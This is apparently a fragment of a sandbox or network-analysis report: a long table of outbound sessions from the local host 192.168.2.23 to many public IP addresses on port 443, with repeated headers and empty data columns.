                                                13483192.168.2.235871439.157.229.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13484192.168.2.2357084199.221.218.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13485192.168.2.235236682.54.193.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13486192.168.2.2336726153.113.187.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13487192.168.2.2356868144.13.222.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13488192.168.2.233298448.138.70.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13489192.168.2.2352358192.107.107.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13490192.168.2.234915441.195.148.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13491192.168.2.2333174145.244.250.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13492192.168.2.2349994113.16.104.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13493192.168.2.2351890150.5.239.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13494192.168.2.235231432.227.227.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13495192.168.2.234280273.147.169.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13496192.168.2.233783869.251.5.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13497192.168.2.2351794187.28.189.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13498192.168.2.233363470.13.133.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13499192.168.2.2336412106.64.13.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13500192.168.2.2359658155.178.148.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13501192.168.2.233427468.151.234.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13502192.168.2.2346518110.221.199.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13503192.168.2.2349954122.234.182.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13504192.168.2.23570769.105.10.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13505192.168.2.2352348160.233.182.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13506192.168.2.234261875.97.93.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13507192.168.2.2342958178.134.49.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13508192.168.2.23528161.126.208.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13509192.168.2.2341260218.200.109.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13510192.168.2.2352238157.127.144.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13511192.168.2.2357824203.126.250.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13512192.168.2.234852269.75.24.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13513192.168.2.2341102188.65.243.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13514192.168.2.233994063.8.69.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13515192.168.2.2339308141.209.143.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13516192.168.2.235520864.11.242.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13517192.168.2.233344035.248.53.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13518192.168.2.234249627.39.231.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13519192.168.2.235752447.24.25.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13520192.168.2.2347048176.64.136.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13521192.168.2.2345622145.208.129.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13522192.168.2.2355384213.119.216.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13523192.168.2.2359694148.198.61.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13524192.168.2.2354038180.187.98.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13525192.168.2.2341994138.36.8.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13526192.168.2.235983292.137.81.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13527192.168.2.234296485.183.24.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13528192.168.2.235715820.0.122.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13529192.168.2.2351406147.145.165.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13530192.168.2.2348442199.240.244.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13531192.168.2.2344380110.64.3.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13532192.168.2.235352240.47.94.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13533192.168.2.2359740118.30.1.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13534192.168.2.235251018.68.110.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13535192.168.2.235751094.153.18.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13536192.168.2.235253483.58.221.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13537192.168.2.235687031.1.68.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13538192.168.2.2333478123.174.74.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13539192.168.2.233556440.132.16.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13540192.168.2.234998448.206.31.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13541192.168.2.2344654187.31.242.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13542192.168.2.23435344.220.36.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13543192.168.2.2348454131.220.198.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13544192.168.2.2358844186.15.217.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13545192.168.2.2359230188.47.163.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13546192.168.2.2338490120.37.72.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13547192.168.2.234937039.235.16.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13548192.168.2.2350768147.24.112.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13549192.168.2.234348832.144.63.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13550192.168.2.2336864126.72.2.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13551192.168.2.2357452193.52.119.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13552192.168.2.2344046129.195.193.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13553192.168.2.23562045.241.65.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13554192.168.2.2352046172.242.36.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13555192.168.2.2336182137.203.95.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13556192.168.2.235267683.173.6.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13557192.168.2.2347594115.63.202.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13558192.168.2.233620683.218.55.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13559192.168.2.2356588136.251.61.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13560192.168.2.2357138168.46.52.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13561192.168.2.2356590190.181.101.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13562192.168.2.2360570207.239.15.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13563192.168.2.2335412198.80.98.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13564192.168.2.2348868126.145.244.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13565192.168.2.233452832.145.187.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13566192.168.2.234054070.181.224.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13567192.168.2.2343384141.103.249.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13568192.168.2.233903897.248.128.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13569192.168.2.2337232156.240.135.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13570192.168.2.235144847.186.250.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13571192.168.2.234428071.187.198.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13572192.168.2.2357850197.205.209.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13573192.168.2.2353186103.172.205.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13574192.168.2.2336066126.26.86.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13575192.168.2.2356874113.68.128.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13576192.168.2.2349856165.92.44.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13577192.168.2.236014074.157.16.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13578192.168.2.2342924222.100.133.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13579192.168.2.2358808134.43.49.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13580192.168.2.2355614121.187.200.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13581192.168.2.234482645.11.161.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13582192.168.2.2357586203.220.215.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13583192.168.2.233654699.20.146.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13584192.168.2.2360086154.34.223.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13585192.168.2.2354604142.116.124.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13586192.168.2.235343419.176.255.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13587192.168.2.235227097.252.202.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13588192.168.2.235238232.232.226.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13589192.168.2.2353788213.128.129.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13590192.168.2.235914645.3.209.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13591192.168.2.2339268209.78.206.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13592192.168.2.2357720118.201.9.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13593192.168.2.2359706166.92.128.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13594192.168.2.2344210218.50.169.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13595192.168.2.2347102155.126.126.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13596192.168.2.2335822205.62.166.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13597192.168.2.2346386198.216.141.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13598192.168.2.2335860213.69.78.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13599192.168.2.2339240192.159.78.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13600192.168.2.2355602142.85.92.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13601192.168.2.2345410216.120.2.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13602192.168.2.235266018.49.22.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13603192.168.2.233886244.129.130.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13604192.168.2.2335282119.122.29.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13605192.168.2.2351358155.14.128.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13606192.168.2.2358570201.114.37.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13607192.168.2.2339958172.210.130.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13608192.168.2.2342848109.53.63.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13609192.168.2.2333852207.50.40.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13610192.168.2.233575648.183.163.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13611192.168.2.235388665.202.127.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13612192.168.2.235977848.97.109.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13613192.168.2.2353072110.187.148.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13614192.168.2.233392277.97.101.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13615192.168.2.235765632.190.27.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13616192.168.2.235179858.148.163.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13617192.168.2.2360422135.231.89.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13618192.168.2.2353540171.104.101.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13619192.168.2.234779418.11.59.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13620192.168.2.2342986177.17.206.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13621192.168.2.2342748216.103.49.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13622192.168.2.234315867.15.32.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13623192.168.2.235252841.12.238.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13624192.168.2.2337752154.249.92.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13625192.168.2.2352666170.198.127.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13626192.168.2.2333558149.166.254.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13627192.168.2.234972069.165.72.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13628192.168.2.2334794206.134.81.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13629192.168.2.234418244.218.37.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13630192.168.2.2353930213.90.36.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13631192.168.2.2357102220.109.140.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13632192.168.2.2334870105.187.24.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13633192.168.2.233777450.154.151.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13634192.168.2.234709885.129.31.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13635192.168.2.2345898174.141.169.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13636192.168.2.234664831.183.204.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13637192.168.2.234720678.169.149.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13638192.168.2.2343350207.237.13.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13639192.168.2.2338808188.236.3.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13640192.168.2.2341214159.1.20.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13641192.168.2.2344506107.183.173.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13642192.168.2.2343484196.6.95.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13643192.168.2.235390491.27.240.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13644192.168.2.2340042199.124.139.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13645192.168.2.235824863.128.75.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13646192.168.2.2350334113.2.13.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13647192.168.2.2342718146.204.160.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13648192.168.2.2335696188.168.41.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13649192.168.2.2336058105.217.190.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13650192.168.2.2344486108.95.90.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13651192.168.2.2359954137.175.238.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13652192.168.2.2349110205.22.204.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13653192.168.2.233817246.121.11.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13654192.168.2.2339174110.142.147.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13655192.168.2.2351326145.252.182.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13656192.168.2.2341932158.187.100.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13657192.168.2.2342480144.194.36.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13658192.168.2.23357925.53.33.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13659192.168.2.235018245.11.222.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13660192.168.2.2359928142.175.175.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13661192.168.2.2346200115.155.156.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13662192.168.2.2359140137.180.141.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13663192.168.2.2334378112.56.217.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13664192.168.2.2355410178.197.6.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13665192.168.2.23570482.55.217.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13666192.168.2.2350340137.186.140.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13667192.168.2.2353274145.90.91.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13668192.168.2.2351094194.14.62.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13669192.168.2.234524043.130.9.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13670192.168.2.23409649.35.8.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13671192.168.2.2355684125.189.35.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13672192.168.2.235412476.16.96.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13673192.168.2.235133854.120.19.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13674192.168.2.236047263.160.250.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13675192.168.2.233438620.129.242.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13676192.168.2.2339754171.253.145.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13677192.168.2.234052470.138.152.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13678192.168.2.235392472.176.51.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13679192.168.2.2349492158.186.30.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13680192.168.2.2343580213.213.89.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13681192.168.2.2356524103.173.167.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13682192.168.2.2337882167.137.235.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13683192.168.2.2334432207.114.13.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13684192.168.2.234980894.185.15.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13685192.168.2.234029662.243.97.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13686192.168.2.2334884152.39.139.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13687192.168.2.233495638.74.81.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13688192.168.2.235238485.97.180.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13689192.168.2.233570895.120.32.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13690192.168.2.234395462.85.61.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13691192.168.2.2354584210.171.141.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13692192.168.2.2348568121.181.155.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13693192.168.2.235666435.198.128.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13694192.168.2.2354712112.57.215.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13695192.168.2.2340958129.158.253.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13696192.168.2.233337837.172.169.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13697192.168.2.2338564158.13.60.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13698192.168.2.2354072125.251.227.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13699192.168.2.2351704181.208.45.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13700192.168.2.235820831.172.55.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13701192.168.2.2334284114.206.77.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13702192.168.2.234875814.51.185.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13703192.168.2.2339726130.64.193.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13704192.168.2.2353704164.139.221.150443
                                                TimestampBytes transferredDirectionData


